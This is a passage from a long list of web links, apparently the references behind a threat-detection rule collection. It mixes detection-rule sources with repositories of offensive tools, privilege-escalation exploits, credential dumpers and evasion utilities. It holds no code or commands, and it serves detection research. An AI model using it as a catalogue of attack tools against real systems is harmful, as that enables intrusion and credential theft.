cs/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html\nhttps://ermetic.com/blog/aws/aws-ec2-imds-what-you-need-to-know/\nhttps://evasions.checkpoint.com/techniques/macos.html\nhttps://f5.pm/go-59627.html\nhttps://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/\nhttps://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/\nhttps://fieldeffect.com/blog/grixba-play-ransomware-impersonates-sentinelone\nhttps://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html\nhttps://firewalld.org/documentation/man-pages/firewall-cmd.html\nhttps://forensafe.com/blogs/typedpaths.html\nhttps://forensicitguy.github.io/agenttesla-vba-certutil-download/\nhttps://forensicitguy.github.io/analyzing-magnitude-magniber-appx/\nhttps://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/\nhttps://forums.veeam.com/veeam-backup-replication-f2/recover-es
xi-password-in-veeam-t34630.html\nhttps://fourcore.io/blogs/threat-hunting-browser-credential-stealing\nhttps://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/\nhttps://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang\nhttps://ghoulsec.medium.com/misc-series-4-forensics-on-edrsilencer-events-428b20b3f983\nhttps://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26\nhttps://gist.github.com/anadr/7465a9fde63d41341136949f14c21105\nhttps://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nhttps://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340\nhttps://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712\nhttps://gist.github.com/Capybara/6228955\nhttps://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8\nhttps://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee\nhttps://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2\nhttps://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d\nhttps://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611\nhttps://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a\nhttps://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70\nhttps://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38\nhttps://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7\nhttps://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752\nhttps://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41\nhttps://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346\nhttps://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f\nhttps://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af\nhttps://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5\nhttps://gist.github.com/nasbench/ca6ef95db04ae04ffd1e0b1ce709cadd\nhttps://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639\nhttps://gist.github.com/Neo23x0/a20436375a1e26524931dd8ea1a3af10\nhttps://gist
.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b\nhttps://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5\nhttps://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb\nhttps://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52\nhttps://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6\nhttps://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf\nhttps://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt\nhttps://git.libssh.org/projects/libssh.git/tree/src/curve25519.c#n420\nhttps://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=\nhttps://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1\nhttps://github.com/0xf4n9x/CVE-2022-46169\nhttps://github.com/0xorOne/nuclei-templates/blob/2fef4270ec6e5573d0a1732cb18bcfc4b1580a88/http/cves/2023/CVE-2023-46747.yaml\nhttps://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/7b8935fe4c82cb64d61343de1a8b2e38dd968534/handbooks/10_post_exploitation.md\nhttps://github.com/1337Rin/Swag-PSO\nhttps://github.com/1N3/Sn1per\nhttps://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner\nhttps://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner\nhttps://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe\nhttps://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList\nhttps://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol\nhttps://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter\nhttps://github.com/3proxy/3proxy\nhttps://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1\nhttps://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%2
0Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8\nhttps://github.com/AaLl86/WindowsInternals/blob/070dc4f317726dfb6ffd2b7a7c121a33a8659b5e/Slides/Hypervisor-enforced%20Paging%20Translation%20-%20The%20end%20of%20non%20data-driven%20Kernel%20Exploits%20(Recon2024).pdf\nhttps://github.com/adrecon/ADRecon\nhttps://github.com/adrecon/AzureADRecon\nhttps://github.com/advisories/GHSA-7g5f-wrx8-5ccf\nhttps://github.com/afwu/PrintNightmare\nhttps://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md\nhttps://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md\nhttps://github.com/AlessandroZ/LaZagne/tree/master\nhttps://github.com/AliBrTab/CVE-2023-46747-POC/tree/main\nhttps://github.com/AlsidOfficial/WSUSpendu/\nhttps://github.com/amjcyber/EDRNoiseMaker\nhttps://github.com/amlweems/xzbot?tab=readme-ov-file#backdoor-demo\nhttps://github.com/antonioCoco/JuicyPotatoNG\nhttps://github.com/antonioCoco/RoguePotato\nhttps://github.com/antonioCoco/RogueWinRM\nhttps://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh\nhttps://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782\nhttps://github.com/apache/spark/pull/36315/files\nhttps://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md\nhttps://github.com/arget13/DDexec\nhttps://github.com/Arno0x/DNSExfiltrator\nhttps://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1\nhttps://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966\nhttps://github.com/audibleblink/xordump\nhttps://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%
20exfiltration%20via%20PowerShell.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml\nhttps://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml\nhttps://github.com/Azure/Azure-Sentinel/pull/3059\nhttps://github.com/Azure/SimuLand\nhttps://github.com/bats3c/ADCSPwn\nhttps://github.com/bats3c/EvtMute\nhttps://github.com/BC-SECURITY/Empire\nhttps://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1\nhttps://github.com/besimorhino/powercat\nhttps://github.com/binderlabs/DirCreate2System\nhttps://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231\nhttps://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36\nhttps://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc\nhttps://github.com/BloodHoundAD/Azu
reHound\nhttps://github.com/BloodHoundAD/BloodHound\nhttps://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1\nhttps://github.com/BloodHoundAD/SharpHound\nhttps://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs\nhttps://github.com/bohops/WSMan-WinRM\nhttps://github.com/boku7/injectAmsiBypass\nhttps://github.com/boku7/spawn\nhttps://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp\nhttps://github.com/bugch3ck/SharpLdapWhoami\nhttps://github.com/byt3bl33d3r/CrackMapExec\nhttps://github.com/byt3bl33d3r/CrackMapExec/\nhttps://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242\nhttps://github.com/byt3bl33d3r/SILENTTRINITY\nhttps://github.com/c3c/ADExplorerSnapshot.py/tree/f700904defac330802bbfedd1d8ffd9248f4ee24\nhttps://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf\nhttps://github.com/calebstewart/CVE-2021-1675\nhttps://github.com/carlospolop/PEASS-ng\nhttps://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat\nhttps://github.com/carlospolop/PEASS-ng/tree/master/linPEAS\nhttps://github.com/CCob/MirrorDump\nhttps://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md\nhttps://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/personality-syscall/README.md\nhttps://github.com/CICADA8-Research/RemoteKrbRelay\nhttps://github.com/CICADA8-Research/RemoteKrbRelay/blob/19ec76ba7aa50c2722b23359bc4541c0a9b2611c/Exploit/RemoteKrbRelay/Relay/Attacks/RemoteRegistry.cs#L31-L40\nhttps://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11\nhttps://github.com/clearvector/lambda-spy\nhttps://github.com/cl
oudflare/cloudflared\nhttps://github.com/cloudflare/cloudflared/releases\nhttps://github.com/codewhitesec/HandleKatz\nhttps://github.com/codewhitesec/SysmonEnte/\nhttps://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png\nhttps://github.com/connormcgarr/LittleCorporal\nhttps://github.com/corelight/CVE-2021-1675\nhttps://github.com/CsEnox/EventViewer-UACBypass\nhttps://github.com/cube0x0\nhttps://github.com/cube0x0/CVE-2021-1675\nhttps://github.com/cube0x0/CVE-2021-36934\nhttps://github.com/cube0x0/KrbRelay\nhttps://github.com/cw1997/NATBypass\nhttps://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/raw/800c0e06571993a54e39571cf27fd474dcc5c0bc/2017/2017.11.14.Muddying_the_Water/muddying-the-water-targeted-attacks.pdf\nhttps://github.com/D1rkMtr/UnhookingPatch\nhttps://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py\nhttps://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1\nhttps://github.com/dagwieers/vsftpd/\nhttps://github.com/danielbohannon/Invoke-DOSfuscation\nhttps://github.com/danielbohannon/Invoke-Obfuscation\nhttps://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888\nhttps://github.com/DarkCoderSc/PowerRunAsSystem/\nhttps://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter\nhttps://github.com/darrenmartyn/VisualDoor\nhttps://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp\nhttps://github.com/Dec0ne/KrbRelayUp\nhttps://github.com/decoder-it/LocalPotato\nhttps://github.com/deepinstinct/Lsass-Shtinkering\nhttps://github.com/deepinstinct/NoFilter\nhttps://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp\nhttps://github.com/defaultnamehere/cookie_crimes/\nhttps://github.com/denandz/KeeFar
ce\nhttps://github.com/diego-treitos/linux-smart-enumeration\nhttps://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp\nhttps://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code\nhttps://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39\nhttps://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables\nhttps://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38\nhttps://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_\nhttps://github.com/dsnezhkov/TruffleSnout\nhttps://github.com/dsnezhkov/TruffleSnout/blob/7c2f22e246ef704bc96c396f66fa854e9ca742b9/TruffleSnout/Docs/USAGE.md\nhttps://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md\nhttps://github.com/EddieIvan01/iox\nhttps://github.com/ehang-io/nps\nhttps://github.com/Ekultek/BlueKeep\nhttps://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml\nhttps://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml\nhttps://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml\nhttps://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml\nhttps://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml\nhttps://github.com/elastic/detection-rules/blob/4312d8c9583be
524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml\nhttps://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml\nhttps://github.com/elastic/detection-rules/blob/5fe7833312031a4787e07893e27e4ea7a7665745/rules/_deprecated/privilege_escalation_krbrelayup_suspicious_logon.toml#L38\nhttps://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml\nhttps://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml\nhttps://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml\nhttps://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml\nhttps://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\nhttps://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml\nhttps://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml\nhttps://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml\nhttps://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/initial_access_via_system_manager.toml\nhttps://github.com/elastic/detection-rules/blob/v8.6.0/rules/integrations/aws/initial_access_via_system_manager.toml\nhttps://github.com/elastic/detection-ru
les/issues/1371\nhttps://github.com/elastic/detection-rules/pull/1145/files\nhttps://github.com/elastic/detection-rules/pull/1213\nhttps://github.com/elastic/detection-rules/pull/1214\nhttps://github.com/elastic/detection-rules/pull/1267\nhttps://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08\nhttps://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2\nhttps://github.com/elddy/NimScan\nhttps://github.com/electron
/rcedit\nhttps://github.com/embedi/CVE-2017-11882\nhttps://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Install-SSP.ps1#L157\nhttps://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545\nhttps://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py\nhttps://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py\nhttps://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165\nhttps://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1\nhttps://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64\nhttps://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64\nhttps://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191\nhttps://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178\nhttps://github.com/EmpireProject/PSInject\nhttps://github.com/eset/malware-ioc/tree/master/oceanlotus\nhttps://github.com/FalconForceTeam/FalconFriday/blob/a9219dfcfd89836f34660223f47d766982bdce46/Discovery/ADWS_Connection_from_Unexpected_Binary-Win.md\nhttps://github.com/FalconForceTeam/FalconFriday/blob/master/Discovery/ADWS_Connection_from_Unexpected_Binary-Win.md\nhttps://github.com/FalconForceTeam/SOAPHound\nhttps://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.e
rb\nhttps://github.com/fatedier/frp\nhttps://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450\nhttps://github.com/fireeye/DueDLLigence\nhttps://github.com/FireFart/hivenightmare\nhttps://github.com/FireFart/hivenightmare/\nhttps://github.com/ForceFledgling/CVE-2023-22518\nhttps://github.com/forgottentq/powershell/blob/9e616363d497143dc955c4fdce68e5c18d28a6cb/captureWindows-Endpoint.ps1#L13\nhttps://github.com/fortra/impacket\nhttps://github.com/fortra/impacket/blob/33058eb2fde6976ea62e04bc7d6b629d64d44712/examples/smbexec.py#L286-L296\nhttps://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60\nhttps://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py\nhttps://github.com/fortra/nanodump\nhttps://github.com/FortyNorthSecurity/WMImplant\nhttps://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427\nhttps://github.com/fox-it/LDAPFragger\nhttps://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry\nhttps://github.com/frgnca/AudioDeviceCmdlets\nhttps://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12\nhttps://github.com/gabe-k/themebleed\nhttps://github.com/gentilkiwi/mimikatz\nhttps://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760\nhttps://github.com/Gerenios/AADInternals\nhttps://github.com/GhostPack/Certify\nhttps://github.com/GhostPack/KeeThief\nhttps://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12\nhttps://github.com/GhostPack/Rubeus\nhttps://github.com/GhostPack/SafetyKatz\nhttps://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63\nhttps://github.com
/GhostPack/Seatbelt\nhttps://github.com/GhostPack/SharpDPAPI\nhttps://github.com/GhostPack/SharpUp\nhttps://github.com/github/securitylab/tree/1786eaae7f90d87ce633c46bbaa0691d2f9bf449/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283\nhttps://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat\nhttps://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1\nhttps://github.com/GossiTheDog/HiveNightmare\nhttps://github.com/GossiTheDog/SystemNightmare\nhttps://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab\nhttps://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c\nhttps://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308\nhttps://github.com/gtworek/PSBits/blob/e97cbbb173b31cbc4d37244d3412de0a114dacfb/NoDLP/bin2wav.ps1\nhttps://github.com/gtworek/PSBits/tree/master/IFilter\nhttps://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\nhttps://github.com/gtworek/PSBits/tree/master/SIP\nhttps://github.com/Gui774ume/ebpfkit\nhttps://github.com/h3v0x/CVE-2021-26084_Confluence\nhttps://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh\nhttps://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh\nhttps://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275\nhttps://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33\nhttps://github.com/hackerhouse-opensource/iscsicpl_bypassUAC\nhttps://github.com/hackerhouse-opensource/iscsicpl_bypassUAC 
